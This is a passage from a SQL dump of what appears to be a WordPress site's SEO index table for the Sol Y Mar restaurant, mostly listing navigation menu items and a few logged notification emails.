Gallery','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-20 17:24:41','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1780,NULL,NULL,3929,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-20 17:24:41','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1781,NULL,NULL,3930,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-20 17:24:41','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1782,NULL,NULL,3931,'post','nav_menu_item',1,0,NULL,NULL,'Single Types','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-20 17:24:41','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1783,NULL,NULL,3932,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-20 17:24:41','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1784,NULL,NULL,3933,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-20 17:24:41','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1785,NULL,NULL,3934,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-20 17:24:41','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1786,NULL,NULL,3935,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-20 17:24:41','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1787,NULL,NULL,3936,'post','nav_menu_item',1,3061,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-20 17:24:41','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1788,NULL,NULL,3937,'post','nav_menu_item',1,3061,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-20 17:24:42','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1789,NULL,NULL,3938,'post','nav_menu_item',1,3061,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-20 17:24:42','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1790,NULL,NULL,3939,'post','nav_menu_item',1,3061,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-20 17:24:42','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1791,NULL,NULL,3940,'post','nav_menu_item',1,3061,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-20 17:24:42','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1792,NULL,NULL,3941,'post','nav_menu_item',1,3061,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-20 17:24:42','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1793,NULL,NULL,3942,'post','nav_menu_item',1,3061,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-20 17:24:42','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1794,NULL,NULL,3943,'post','nav_menu_item',1,3061,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-20 17:24:42','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1795,NULL,NULL,3944,'post','nav_menu_item',1,3061,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-20 17:24:42','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1796,NULL,NULL,3945,'post','nav_menu_item',1,3061,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-20 17:24:42','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1797,NULL,NULL,3946,'post','nav_menu_item',1,3061,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-20 17:24:42','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1798,NULL,NULL,3947,'post','nav_menu_item',1,3061,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-20 17:24:42','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1799,NULL,NULL,3948,'post','nav_menu_item',1,3061,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-20 17:24:42','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1800,NULL,NULL,3949,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-20 17:24:42','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1801,NULL,NULL,3950,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-20 17:24:42','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1802,NULL,NULL,3951,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-20 17:24:42','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1803,NULL,NULL,3952,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-20 17:24:42','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1804,NULL,NULL,3953,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-20 17:24:42','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1805,NULL,NULL,3954,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-20 17:24:42','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1806,NULL,NULL,3955,'post','nav_menu_item',1,3061,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-20 17:24:42','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1807,NULL,NULL,3956,'post','nav_menu_item',1,3061,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-20 17:24:42','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1808,NULL,NULL,3957,'post','nav_menu_item',1,3061,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-20 17:24:42','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1809,NULL,NULL,3958,'post','nav_menu_item',1,3061,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-20 17:24:42','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1810,NULL,NULL,3959,'post','nav_menu_item',1,3061,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-20 17:24:42','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1811,NULL,NULL,3960,'post','nav_menu_item',1,3061,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-20 17:24:42','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1812,NULL,NULL,3961,'post','nav_menu_item',1,3061,NULL,NULL,'Three Columns','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-20 17:24:42','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1813,NULL,NULL,3962,'post','nav_menu_item',1,3061,NULL,NULL,'Four Columns Wide','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-20 17:24:42','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1814,NULL,NULL,3963,'post','nav_menu_item',1,3061,NULL,NULL,'Four Columns','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-20 17:24:42','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1815,NULL,NULL,3964,'post','nav_menu_item',1,3061,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-20 17:24:42','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1816,NULL,NULL,3965,'post','nav_menu_item',1,3061,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-20 17:24:42','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1817,NULL,NULL,3966,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-20 17:24:42','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1818,NULL,NULL,3967,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-20 17:24:42','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1819,NULL,NULL,3968,'post','nav_menu_item',1,3061,NULL,NULL,'FIve Columns Wide','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-20 17:24:42','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1820,NULL,NULL,3969,'post','nav_menu_item',1,3061,NULL,NULL,'FIve Columns Wide','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-20 17:24:43','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1821,NULL,NULL,3970,'post','nav_menu_item',1,3061,NULL,NULL,'Six Columns Wide','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-20 17:24:43','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1822,NULL,NULL,3971,'post','nav_menu_item',1,3061,NULL,NULL,'Six Columns Wide','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-20 17:24:43','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1823,NULL,NULL,68,'user',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,NULL,NULL,NULL,NULL,'https://secure.gravatar.com/avatar/5816fea29dbd193e528bc2123aa677de?s=500&d=mm&r=g',NULL,NULL,'gravatar-image',NULL,NULL,'https://secure.gravatar.com/avatar/5816fea29dbd193e528bc2123aa677de?s=500&d=mm&r=g',NULL,'gravatar-image',NULL,NULL,NULL,NULL,'2021-01-20 17:27:30','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1824,NULL,NULL,3972,'post','postman_sent_mail',0,0,NULL,NULL,'Private: Your Sol Y Mar account has been created!','private',0,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,1,NULL,NULL,'2021-01-20 17:27:34','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2597,'https://www.ristorantesolymar.it/vecchio/postman_sent_mail/sol-y-mar-alcuni-plugin-sono-stati-aggiornati-automaticamente-11/','124:dafa4d7d1e9d8bfd4586509294a134d6',4624,'post','postman_sent_mail',0,0,NULL,NULL,'Privato: [Sol Y Mar] Alcuni plugin sono stati aggiornati automaticamente','private',0,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-02-22 12:52:56','2021-02-22 17:52:56',1,NULL,NULL,NULL,NULL,0,NULL),(1829,NULL,NULL,3982,'post','postman_sent_mail',0,0,NULL,NULL,'Private: [Sol Y Mar] Some plugins were automatically updated','private',0,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-22 00:29:24','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1831,NULL,NULL,3985,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-22 08:35:31','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1833,NULL,NULL,3986,'post','postman_sent_mail',0,0,NULL,NULL,'Private: Your Sol Y Mar account has been created!','private',0,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,1,NULL,NULL,'2021-01-22 10:00:39','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1834,NULL,NULL,3987,'post','postman_sent_mail',0,0,NULL,NULL,'Private: [Sol Y Mar] Some plugins were automatically updated','private',0,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-22 12:24:18','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1835,NULL,NULL,3989,'post','nav_menu_item',1,0,NULL,NULL,'Home','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:36:09','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1836,NULL,NULL,3990,'post','nav_menu_item',1,0,NULL,NULL,'Pages','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:36:09','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1837,NULL,NULL,3991,'post','nav_menu_item',1,0,NULL,NULL,'Blog','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:36:09','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1838,NULL,NULL,3992,'post','nav_menu_item',1,0,NULL,NULL,'Shop','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:36:09','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1839,NULL,NULL,3993,'post','nav_menu_item',1,0,NULL,NULL,'Portfolio','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:36:09','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1840,NULL,NULL,3994,'post','nav_menu_item',1,0,NULL,NULL,'Elements','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:36:09','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1841,NULL,NULL,3995,'post','nav_menu_item',1,0,NULL,NULL,'Home','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:36:09','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1842,NULL,NULL,3996,'post','nav_menu_item',1,0,NULL,NULL,'Pages','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:36:09','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1843,NULL,NULL,3997,'post','nav_menu_item',1,0,NULL,NULL,'Portfolio','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:36:09','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1844,NULL,NULL,3998,'post','nav_menu_item',1,0,NULL,NULL,'Shop','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:36:09','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1845,NULL,NULL,3999,'post','nav_menu_item',1,0,NULL,NULL,'Blog','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:36:09','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1846,NULL,NULL,4000,'post','nav_menu_item',1,0,NULL,NULL,'Elements','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:36:09','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1847,NULL,NULL,4001,'post','nav_menu_item',1,0,NULL,NULL,'Home','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:36:09','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1848,NULL,NULL,4002,'post','nav_menu_item',1,0,NULL,NULL,'Pages','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:36:09','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1849,NULL,NULL,4003,'post','nav_menu_item',1,0,NULL,NULL,'Shop','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:36:09','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1850,NULL,NULL,4004,'post','nav_menu_item',1,0,NULL,NULL,'Portfolio','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:36:09','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1851,NULL,NULL,4005,'post','nav_menu_item',1,0,NULL,NULL,'Blog','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:36:09','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1852,NULL,NULL,4006,'post','nav_menu_item',1,0,NULL,NULL,'Home','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:36:09','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1853,NULL,NULL,4007,'post','nav_menu_item',1,0,NULL,NULL,'Pages','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:36:09','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1854,NULL,NULL,4008,'post','nav_menu_item',1,0,NULL,NULL,'Shop','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:36:09','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1855,NULL,NULL,4009,'post','nav_menu_item',1,0,NULL,NULL,'Blog','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:36:09','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1856,NULL,NULL,4010,'post','nav_menu_item',1,0,NULL,NULL,'Product Single','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:36:09','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1857,NULL,NULL,4011,'post','nav_menu_item',1,0,NULL,NULL,'Shop Layouts','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:36:09','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1858,NULL,NULL,4012,'post','nav_menu_item',1,0,NULL,NULL,'Shop 